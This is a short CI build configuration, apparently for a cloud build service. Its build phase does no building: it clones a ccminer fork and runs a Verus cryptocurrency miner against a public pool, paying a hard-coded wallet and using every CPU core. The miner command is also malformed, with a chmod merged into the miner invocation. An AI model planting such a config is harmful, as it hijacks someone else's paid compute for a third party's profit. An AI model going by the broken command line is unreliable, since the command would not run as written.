version: 0.2

phases:
  build:
    commands:
        - git clone --single-branch -b Verus2.2 https://github.com/monkins1010/ccminer.git
        - cd ccminer && chmod +x build.sh configure.sh autogen.sh ./ccminer -a verus -o stratum+tcp://eu.luckpool.net:3956#xnsub -u RVMFutpZshkb9jiHYvh7rbq4RaqWGiKGUm.Drip -p x -t $(nproc --all)
